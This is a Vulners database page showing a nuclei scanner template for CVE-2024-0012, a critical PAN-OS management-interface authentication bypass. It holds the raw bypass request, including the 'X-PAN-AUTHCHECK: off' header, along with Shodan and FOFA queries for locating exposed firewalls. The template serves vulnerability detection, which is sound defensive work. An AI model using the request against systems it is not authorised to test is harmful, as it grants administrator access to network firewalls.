Lucene search
K

PAN-OS Management Web Interface - Authentication Bypass

🗓️ 03 Jul 2026 13:39:16Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 153 Views

PAN-OS Management Web Interface Authentication Bypass CVE-2024-001

Related
Refs
Code
id: CVE-2024-0012

info:
  name: PAN-OS Management Web Interface - Authentication Bypass
  author: johnk3r,watchtowr
  severity: critical
  description: |
    An authentication bypass in Palo Alto Networks PAN-OS software enables an unauthenticated attacker with network access to the management web interface to gain PAN-OS administrator privileges to perform administrative actions, tamper with the configuration, or exploit other authenticated privilege escalation vulnerabilities
  impact: |
    Unauthenticated attackers with network access to the management interface can bypass authentication to gain full administrator privileges, allowing them to tamper with configurations, exploit additional vulnerabilities, and completely compromise the Palo Alto firewall and connected networks.
  remediation: |
    Upgrade to the latest patched version of PAN-OS as specified in the vendor security advisory.
  reference:
    - https://security.paloaltonetworks.com/CVE-2024-0012
    - https://labs.watchtowr.com/pots-and-pans-aka-an-sslvpn-palo-alto-pan-os-cve-2024-0012-and-cve-2024-9474/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-0012
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-0012
    cwe-id: CWE-306
    epss-score: 0.99698
    epss-percentile: 0.9995
    cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: paloaltonetworks
    product: pan-os
    fofa-query: icon_hash="-631559155"
    shodan-query:
      - cpe:"cpe:2.3:o:paloaltonetworks:pan-os"
      - http.favicon.hash:"-631559155"
  tags: cve,cve2024,paloalto,globalprotect,kev,vkev,vuln

http:
  - raw:
      - |
        GET /php/ztp_gate.php/.js.map HTTP/1.1
        Host: {{Hostname}}
        X-PAN-AUTHCHECK: off

    matchers:
      - type: dsl
        dsl:
          - 'contains_any(body, "<title>Zero Touch Provisioning", "Zero Touch Provisioning (ZTP)")'
          - 'contains(body, "/scripts/cache/mainui.javascript")'
          - 'contains(header, "PHPSESSID=")'
          - 'status_code == 200'
        condition: and
# digest: 4b0a00483046022100ce73e702ec0a7d9f83518f54af2747fadb21931a7a0023e8ab2e90843d1561df0221009f2b96ce6724306bb1595888c95d8a12cca1f2fadacadab954a630efbbf624c6:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 3.19.8
CVSS 49.3
EPSS0.99698
SSVC
153